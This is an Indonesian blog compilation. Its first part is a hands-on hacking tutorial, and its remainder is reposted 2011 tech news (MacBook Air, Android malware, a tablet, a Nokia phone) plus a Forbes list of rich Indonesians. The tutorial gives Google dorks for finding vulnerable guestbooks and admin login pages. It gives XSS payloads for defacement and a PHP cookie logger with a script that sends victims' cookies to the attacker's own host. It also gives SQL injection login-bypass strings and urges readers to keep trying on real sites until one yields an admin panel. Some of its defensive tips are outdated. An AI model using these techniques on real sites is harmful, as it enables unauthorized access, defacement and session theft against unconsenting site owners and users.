XSS Injector

XSS Injections

XSS merupakan sebuah serangan yang termasuk dalam jenis injeksi kode. Penyerangan ini dilakukan dengan cara memasukkan kode-kode html ke dalam suatu situs. Akibat yang bisa ditimbulkan dari serangan ini antara lain penyerang dapat memotong keamanan dari sisi klien, mendapatkan informasi yang bersifat case sensitif, atau bisa saja menyisipkan aplikasi berbahaya ke dalam web yang diserang.

Ada dua tipe serangan XSS:

1. Reflected atau nonpersistent
   tipe serangan XSS ini merupakan tipe serangan yang paling umum dilakukan oleh penyerang. Cara kerjanya adalah penyerang menggunakan tautan pada media social engineering agar tautan yang sudah disisipi kode berbahaya ini diklik oleh pengguna. Jika tautan berbahaya ini diklik oleh pengguna maka penyerang akan mendapatkan cookie pengguna yang nantinya akan digunakan untuk membajak session pengguna. Pertahanan untuk menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data dan jangan mudah percaya pada apapun yang dikirim pengguna, terutama jika itu merupakan sebuah tautan.
2. Stored atau Persistent
   serangan jenis ini jarang ditemui tetapi memiliki dampak serangan yang besar. Sebuah serangan pada stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi pada saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali.

Contoh penggunaan XSS injector

1. masukkan kata kunci inurl:.com/guestbook ke dalam mesin pencari google, keyword tersebut digunakan untuk mencari alamat website .com/guestbook
2. setelah pencarian keluar, lalu pilih website mana yang akan kita jadikan sasaran XSS injector, setelah lakukan pengetesan dengan cara memasukkan kode dibawah ini ke dalam textfield yang ada dibagian guestbook.
   <script>alert(“/XSS”/)</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”)</script>;
<script>alert(String.fromCharCode(88,83,83))</script>
<body onload=alert(‘XSS’)>
<script type=text/javascript>alert(“XSS”)</script>
3. jika setelah di enter muncul pop up yang berisi tulisan XSS, itu artinya situs tersebut siap untuk kita serang.
4. Beberapa jenis serangan yang bisa kita lakukan adalah melakukan defacement dan mencuri cookies dari website tersebut.
5. Untuk melakukan defacement kita dapat memasang kode
   <meta http-equiv=”refresh” content=”0;url=http://www.tinypic.com/deface.png” />
   atau
   <script>window.open( “http://www.tinypic.com/deface.png” )</script>
6. sedangkan untuk melakukan pencurian cookies. Jika kita memasukkan script berikut ini <script>alert(document.cookie)</script> , kita dapat mencuri login information dari situs yang kita serang. Namun kita harus menggunakan cookie editor untuk bisa menggunakan cookie yang tercuri tersebut.
7. Alternatif lain adalah dengan membuat cookie logger sendiri. Buat sebuah file dengan nama cookielogger.php. Masukkan script dibawah ini:
   <?php
$cookie = $_GET['cookie'];
$log = fopen(“cookies.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>
8. setelah itu buat sebuah file kosong dengan nama cookies.txt. File kosong ini nantinya akan digunakan untuk menuliskan hasil cookie yang kita curi. Setelah itu upload kedua file ini kedalam media hosting yang mendukung php seperti ripway.com, 000webhost.com dan lain-lain.
9. Kemudian sisipkan kode berikut ke situs yang akan diserang
10. <script>alert(namalogin.namamediahostingkamu.com/cookielogger.php)</script>
11. atau
12. <script>document.location=’namalogin.namamediahostingkamu.com/cookielogger.php?
cookie=’+escape(document.cookie) </script>
13. setelah memasukkan kode tersebut maka cookie akan tertulis di file cookies.txt yang kita hosting ke dalam media hosting kita. Login kedalam media host kemudian buka file cookies.txt

SQL Injector

Sql injections

apa itu sql injections?

Sql injections adalah salah satu teknik hacking yang memanfaatkan celah keamanan yang terjadi pada lapisan basis data dalam sebuah aplikasi. Cara kerja sql injections adalah dengan memodifikasi perintah sql yang ada di memori aplikasi pengguna.

Penyebab terjadinya sql injections

sql injections terjadi dikarenakan tidak adanya filter terhadap karakter-karakter seperti tanda petik satu ' , karakter double minus –. hal inilah yang menyebabkan suatu aplikasi dapat disisipi oleh perintah-perintah sql yang dimanfaatkan untuk melakukan suatu penyerangan terhadap aplikasi.

Bahaya sql injections

salah satu bahaya yang bisa ditimbulkan dari penyerangan ini adalah seseorang bisa masuk ke dalam sistem tanpa harus memiliki account. Hal ini juga bisa memicu seseorang yang tidak memiliki izin masuk ke dalam sistem untuk merubah, menghapus dan menambahkan data-data yang ada di dalam database. Penyerangan ini juga memungkinkan seseorang untuk mematikan suatu database, sehingga web server tidak bisa mengakses data-data yang ada di dalam database tersebut.

Yang diperlukan untuk melakukan sql injections

1. browser
2. sambungan internet
3. software, contoh software yang digunakan adalah softice

contoh sintaks yang bisa digunakan untuk sql injections

$SQL = “select*from login where username = '$username' and password = '$password'”; (diperoleh dari get dan post variable)

sisipkan perintah OR'=' kedalam password, sehingga akan didapat kode

“select*from login where username = '$username' and password = 'pass' or '='”;

dengan begitu kita sudah bisa meng-inject sebuah sintaks sql hanya dengan menggunakan perintah OR.

Cara mencegah dan mengatasi sql injections

1. dengan melindungi query sql
teknik yang bisa diterapkan untuk melindungi query sql adalah dengan cara mengosongkan seluruh input yang diterima dari request object, seperti: Request, Request.Querystring,Request.Form,Request.Cookies dan Request.ServerVariables. Akan tetapi teknik ini sangat bergantung pada RDBMS. RDBMS memiliki sistem yang multiuser, sehingga RDMS menyertakan fitur keamanan untuk mengontrol akses ke/dan penggunaan database.
2. mengganti pesan error
cara kedua adalah dengan mengganti pesan error. Hal ini dikarenakan para penyerang bisa memanfaatkan pesan error ini untuk menelusuri jalur penyimpanan database.
3. batasi permisi
berikan hak izin hanya pada user yang terotorisasi saja. User harus yakin bahwa data yang ia terima sudah akurat dan tidak melakukan kecerobohan dalam memodifikasinya
4. sembunyikan atau matikan pesan error yang keluar dari SQL server yang sedang berjalan
5. jika memungkinkan, matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures
6. menggunakan MYSQL_escape_string

cara kerja teknik ini adalah dengan merubah string yang mengandung karakter ' menjadi \'. contohnya SQL infec'tion menjadi SQL infec\tion.

7. melakukan filter terhadap karakter ' dengan memodifikasi php.ini

modifikasi ini dimaksudkan untuk mengaktifkan variable magic_qoutes pada php.ini sehingga secara otomatis karakter ' diubah menjadi karakter \ .

contoh implementasi sql injections

1. masukkan salah satu dari keyword dibawah ini kedalam mesin pencari google
   “/admin.asp”
   “/login.asp”
   “/logon.asp”
   “/adminlogin.asp”
   “/adminlogon.asp”
   “/admin_login.asp”
   “/admin_logon.asp”
   “/admin/login.asp”
   “/admin/logon.asp”
   (anda bisa menambahkan sendiri keyword sesuai keinginan anda)
2. kemudian buka salah satu link yang berhasil ditemukan oleh google, kemungkinan hasil pencarian yang ditampilkan adalah sebuah halaman login.
3. Setelah itu masukkan kode berikut :
   Username : 'or 'a'='a
   Password : 'or 'a'='a
4. jika anda berhasil, maka kemungkinan anda akan masuk ke dalam halaman admin panel. Di halaman admin panel ini anda bisa menambahkan berita,mengedit user lain dan lain-lain.
5. Jika cara diatas belum berhasil, coba untuk membuka link lain yang ditampilkan di mesin pencari google.
6. Banyaknya variasi kode memungkinkan kita untuk bisa mengeksplor kode program, seperti:
   Username : admin
   Password : 'or 'a '=' a
   atau kita juga bisa mengkombinasikan kedua kode tersebut, sehingga bentuk kodenya menjadi:
   'or 0=0 -- ; “or 0=0 -- ; 'or 0=0 #;
7. jika masih belum berhasil, coba terus terus sampai anda berhasil masuk ke dalam admin panel

Macbook Air 15 inchi

Apple dikabarkan siap meluncurkan sejumlah seri notebook Macbook Air terbaru. Setidaknya apple mempersiapkan tiga seri Macbook Air yang berdasarkan pada ukuran layar yakni 11,6 inch, 13,3 inch dan 15 inch. Adapun model Macbook Air 15 inch diharapkan menjadi model yang mampu mendiferesiasi apple dalam menghadapi maraknya produk ultrabook dari produsen pesaing apple. 

Seperti dikutip dari Digitimes, sumber mengatakan Macbook Air terbaru ini siap dipasarkan pada kuartal pertama tahun 2012. Apple dikabarkan sengaja mempersiapkannya untuk menyaingi ultrabook dari produsen lain. Ultrabook selama ini merujuk pada produk-produk notebook yang ultra portable dengan design yang sangat tipis. Kemunculan ultrabook kerap dianggap terpengaruh oleh design Macbook Air. 

Apple sendiri terkahir kali meluncurkan produk Macbook Air pada juli kemarin. Perubahan terbesar yang terjadi pada Macbook Air terbaru ini terdapat pada processor dan Port Thunderbolt, yang menggantikan MiniDisplayPort pada versi sebelumnya. Port Thunderbolt merupakan koneksi harware berbasis Intel Light Peak dengan kecepatan maksimum 10 Gb/s. Sedangkan processor yang digunakan pada Macbook Air versi baru ini adalah processor standar core i5 (1,6 GHz dan 1,7 GHz dalam model layar 11 dan 13 inch), yang bisa di upgrade sampai 1,8 GHz core i7. Sedangkan untuk versi lamanya hanya menggunakan processor 1,4 GHz dan 1,8 GHz Intel Core 2 Duo.

Sumber Digitimes dari retail menyebut, Apple akan menjatuhkan harga Macbook Air yang telah ada, sebelum meluncurkan Macbook Air versi terbaru ini. Dengan cara ini, apple diperkirakan dapat meningkatkan perannya di pasar penjualan notebook.

sumber: vivanews

Malware ancam android

Perilisan mc afee terbaru menyatakan bahwa sepanjang kuartal ketiga tahun 2011 sistem operasi android menjadi target utama serangan malware pada perangkat selular. Menurut mc afee, seperti dilansir dari techcrunch.com bahwa hampir semua malware baru dalam kuartal ketiga ini menyasar android. Berdasarkan laporan malware yang menjadikan perangkat android sebagai sasaran melonjak sampai 37 persen. Hal ini mentasbihkan bahwa tahun ini adalah tahun tersibuk dalam sejarah malware.

Dua diantara malware yang menyerang perangkat android adalah DroidDream Light dan Zitmo. Sebelumnya DroidDream Light ini telah menyerang 120.000 pengguna android. Menurut Lookout, sebuah perusahaan pembuat antivirus yang menemukan kedua malware tersebut, DroidDream Light ditemukan menempel pada aplikasi resmi yang terdapat di android market, seperti: Quick Falldown, Sientific Calcullator, Buble Buster dan  sebuah klon dari Best Compass dan Leveler. Diperkirakan bahwa malware ini telah menginfeksi lebih dari 50 aplikasi di android market. 

Cara kerja malware ini adalah dengan menginstal aplikasi tambahan secara otomatis je dalam ponsel Android. Begitu terinfeksi, ponsel akan merestart sendiri begitu ada panggilan masuk. Saat itulah, malware akan menginstal aplikasi tambahan berupa trilojan. Trojan inilah yang akan menyadap ponsel kamu. Ia akan mencuri data pribadi kamu, seperti email, password, user account, nomor kartu kredit.

Sedangkan untuk varian malware yang lain yaitu Zitmo. Malware ini bertugas mencuri informasi bank dari pengguna ponsel android. Begitu pengguna mengakses website bank miliknya, malware ini segera bekerja dengan merekam pesan atau sms yang memberikan kode atau password bank kemudian melakukan transaksi dengan menggunakan akun tersebut.

Cara malware menginfeksi perangkat android adalah pada saat kita mengunduh sebuah aplikasi. Karena pada saat tersebut sistem akan terbuka dan smartphone yanng tidak dilengkapi dengan sistem keamanan menjadi salah satu penyebab malware ini mudah menyebar.

Lalu bagaimana cara pengguna android mengamankan perangkat android miliknya dari ancaman malware? Berikut adalah tips mengamankan perangkat android seperti dikutip dari situs tabloidpcplus.com.

1. Selalu mengunci perangkat anda, dan gunakan password untuk melakukan akses ke perangkat komunikasi kamu.

2. Jika kamu akan memasukan data pribadi, lakukan hanya untuk aplikasi-aplikasi yang disediakan oleh pembuatnya. Itu berarti, jika kamu men-download Facebook app haruslah dari website Facebook, demikian juga dengan twitter app dari Twitter, Yahoo messenger app dari Yahoo.

3. Jangan menyimpan informasi bersifat rahasia didalam perangkat smartphone kamu.

4. Aktifkan Password programs.

5. Matikan fungsi layanan geo-location.

6. Aktifkan sistem proteksi password.

7. Hapus atau pindahkan foto-foto pribadi yang tidak ingin kamu sebarkan.

8. Jangan menginstall aplikasi-aplikasi dari pengembang yang tidak dikenal. Jika kamu sudah terlanjur melakukan download yang dimaksud, hentikan dulu aktifitas online banking dari perangkat mobile anda, karena applikasi tersebut berpotensi malware.

9. Cermati dulu aplikasi-aplikasi yang ingin kamu download dan install

• Apakah aplikasi tersebut telah didownload ratusan ribu kali?

• Apakah memiliki rating yang tinggi?

• Apakah aplikasi-aplikasi tersebut sudah ada sejak lama?

• Apakah pengembang aplikasi tersebut dipercaya oleh kalangan industri dan

customernya? Untuk mengetahuinya dapat dilakukan dengan memeriksa melalui search engine, melalui jejaring sosial, maupun dari micro blog.

10. Jika kamu mengklik sebuah link di e-mail, jangan pernah memasukkan data-data pribadi ke dalamnya. Karena banyak kasus masuknya malware melalui modus tersebut, terlebih jika dilakukan melalui perangkat komunikasi mobile, resikonya akan semakin tinggi. Akan lebih aman jika melakukannya dengan memasukkan nama website pada web browser, baru kemudian masukan data.

11. Install aplikasi keamanan dan aktifkan program Anti Virus.

12. Perlakukan perangkat smartphone kamu layaknya desktop karena pelaku kejahatan dunia maya tidak perduli platfom apa yang kamu gunakan, tetapi justru menyasar setiap orang untuk dijadikan korban.

Cyrus Tab: Tab android dengan fitur tv digital dan analog

ilustrasi pengguna tablet

Cyrus TV Pad 3G wifi merupakan sebuah tablet pertama di Indonesia yang menghadirkan tablet dan TV sekaligus. Tablet ini menghadirkan solusi multimedia bagi masyarkat dengan mobilitas tinggi dalam bentuk fitur Tv analog maupun digital baik itu untuk saluran tv lokal maupun internasional. Selain itu, tablet berkukuran 7 inchi yang didampingin dengan OS Android versi Gingerbread 2.3. Seperti diketahui android gingerbread 2.3 memiliki beberapa kelebihan dibanding dengan OS android yang lain diantaranya adalah tampilan yang lebih rapi dan mudah dipelajari. Tablet ini juga dilengkapi dengan fitur-fitur lain seperti kamera 5 megapixel, GPS, serta dapat berfungsi untuk telepon maupun sms. 

“Cyrus TV Tab menjawab kebutuhan masyarakat yang mobile, tapi tak sempat menonton TV sambil browsing,” ujar Marketing Manager MKN, Budiasto Kusuma dalam peluncuran produk di Mal Ambasador Lantai III, Jakarta, Selasa, 29 November 2011.

Budi mengatakan, menurut riset yang dilakukan, saat ini pengguna lebih menghabiskan waktunya di jalan. Sejalan dengan itu, perilaku masyarakat pengguna internet kini beralih kepada mobile internet. Untuk itu, fitur TV dalam tablet ini merupakan pembeda utama dibandingkan dengan tablet yang lain.

“Ini jadi solusi hal tersebut, fitur TV menjadi diferensiasi,” ucap Budi. Ia pun optimistis tablet TV Android ini akan meraih sukses, mengingat hasil survei menunjukkan bahwa dari 100 responden, 80 persen menyukai produk ini dilihat dari pengalaman penggunanya.

Segmen tablet ini disasar mulai dari kalangan menengah, eksekutif sampai anak-anak maupun dewasa. Yang atinya tablet ini dapat digunakan oleh semua segmen. Target yang ingin dicapai MKN 3 bulan kedepan adalah menjual tablet ini sebanyak 30 ribu unit dan sekarang ini sudah dipesan sebanyak 4 ribu unit.

Mitra Komunikasi Nusantara (MKN) menggandeng telkomsel untuk menghadirkan bundling tablet Cyrus TV ini. Harga tablet ini dipasaran mencapai Rp2,88 juta. Kedepannya MKN berencana untuk mengembangkan layanan fitur Tv On Demand.

Sumber: vivanews

Nokia Asha 303

Smartphone terbaru nokia yang akan beredar pada awal bulan desember ini merupakan bentuk dari komitmen nokia untuk menghubungkan semua orang dengan dunia internet. Nokia Asha 303 memiliki akses satu tombol dalam layar utama untuk pesan, email, maupun jejaring sosial, termasuk Facebook chat dan WhatsApp. Nokia ‘Asha’ ini juga telah dilengkapi dengan aplikasi Angry Birds tanpa perlu download. Dengan layar 2,6 inci, pengalaman yang akan dirasakan pengguna, diklaim jadi lebih baik. Ponsel ini menggunakan prosesor 1GHz, mendukung 3,5G HSPA serta WiFi, membuat kecepatan akses saat pengguna terhubung ke Internet jadi lebih nyaman. Smartphone ini juga dilengkapi dengan kamera 3,2MP dan penyimpanan 32GB.

Untuk pemakai ponsel yang suka membaca, pemilik dapat memilih ebook yang inginkan. Karena, kebutuha akan suatu bacaan pun dapat diakomodasi oleh ponsel ini. Selain itu, pada ponsel ini juga dilengkapi aplikasi layanan nokia seperti nokia browser, nokia maps, nokia live tools serta nokia music. Lewat aplikasi nokia music para pengguna ponsel ini dapat mendownload lagu sepuasnya selama 6 bulan. 

"Bisa dikatakan pengalaman smartphone sudah ada di Nokia Asha,” sebut Anvid Erdian, Product Manager Nokia Indonesia.

Selain dilengkapi dengan layar sentuh, ponsel ini juga bisa memberikan penglaman qwerty yang berbeda. Hal itu ditunjukkan dengan penggunaan Qwerty untuk semua kebutuhan baik itu instan messaging, email, SMS, media sosial dengan mudah dan cepat dalam metode input Qwerty plus layar sentuh.

"Sesuai dengan namanya, Asha yang berarti harapan, ponsel mobile ini diharapkan diterima oleh kalangan masyarakat Indonesia yang muda dan energik,” harap Anvid. 

Dengan mengedepankan pengalaman yang berbeda dan upaya untuk menghubungkan 1,2 milyar penduduk bumi yang belum mampu terhubung ke internet, harga ponsel ini dibanderol dengan harga Rp1.470 juta. Dengan melihat semua fitur yang disediakan oleh ponsel harga tersebut tentulah tidak terlalu mahal jika dibangdingkan dengan ponsel-ponsel sejenis yang memiliki fitur yang hampir sama. Nokia memprediksikan bahwa ponsel ini akan menarik minat banyak pengguna ponsel di Indonesia.

Untuk melihat spesifikasi Nokia Asha 303 lebih lanjut silahkan kunjungi situs 
nokia indonesia

Sumber: vivanews

40 Daftar Orang Terkaya RI

Baru-baru ini majalah ekonomi terkemuka, Forbes, mengeluarkan daftar orang-orang terkaya di Indonesia. Sebanyak 40 pengusaha di Indonesia dianggap forbes layak dinobatkan sebagai orang terkaya di jagat nusantara. Perhitungan kekayaan yang digunakan majalah forbes untuk menilai kekayaan orang terkaya ini adalah dengan menggunakan perhitungan harga saham tanggal 11 november 2011 dan nilai tukar rupiah. Sedangkan untuk perusahaan tertutup dinilai dengan membandingkan dengan perusahaan serupa yang sudah mencatatkan saham di bursa saham.

Berbeda dengan daftar kekayaan miliarder yang dikeluarkan forbes yang lebih berfokus pada kekayaan individu, daftar orang terkaya di Indonesia lebih merefleksikan kekayaan dari sebuah keluarga.

Berikut daftar 40 orang terkaya di Indonesia:
1. Budi & Michael Hartono (US$14 miliar). 
2. Susilo Wonowidjojo (US$10,5 miliar). 
3. Eka Tjipta Widjaja (US$8 miliar)
4. Low Tung Kwok (US$3,7 miliar)
5. Anthoni Salim (US$3,6 miliar)
6. Sukanto Tanoto (US$2,8 miliar)
7. Martua Sitorus (US$2,7 miliar)
8. Peter Sondakh (US$2,6 miliar)
9. Putera Sampoerna (US$2,4 miliar)
10. Achmad Hamami (US$ 2,2 miliar)
11. Chairul Tanjung (US$2,1 miliar)
12. Boenjamin Setiawan (US$2 miliar)
13. Sri Prakash Lohia (US$1,7 miliar)
14. Murdaya Poo (US$1,5 miliar)
15. Tahir (US$1,4 miliar)
16. Edwin Soeryadjaya (US$1,35 miliar)
17. Kiki Barki (US$1,3 miliar)
18. Garibaldi Thohir (US$1,25 miliar)
19. Sjamsul Nursalim (US$1,22 miliar)
20. Ciliandra Fangiono (US$1,21 miliar)
21. Eddy William Katuari (US$1,2 miliar)
22. Hary Tanoesoedibjo (US$1,19 miliar)
23. Kartini Muljadi (US$1,15 miliar)
24. Theodore Rachmat (US$1,14 miliar)
25. Djoko Susanto (US$1,04 miliar)
26. Harjo Sutanto (US$1 miliar)
27. Ciputra (US$950 juta)
28. Samin Tan (US$940 juta)
29. Benny Subianto (US$900 juta)
30. Aburizal Bakrie (US$890 juta)
31. Engki Wibowo & Jenny Quantero (US$810 juta)
32. Hashim Djojohadikusumo (US$790 juta)
33. Soegiarto Adikoesoemo (US$770 juta)
34. Kuncoro Wibowo (US$730 juta)
35. Muhammad Aksa Mahmud (US$710 juta)
36. Husain Djojonegoro (US$700 juta)
37. Sandiaga Uno (US$660 juta)
38. Mochtar Riady (US$650 juta)
39. Trihatma Haliman (US$640 juta)
40. Handojo Santosa (US$630 juta)

Urutan tiga besar orang terkaya di Indonesia masih ditempati oleh keluarga Hartono, Susilo Wonowidjojo dan Eka Tjipta Widjaja. Tambahan kekayaan tiga pengusaha ini ditaksir mencapai angka $7,5 miliar atau menguasai lebih dari setengah kekayaan 40 orang terkaya di Indonesia.

Sumber: vivanews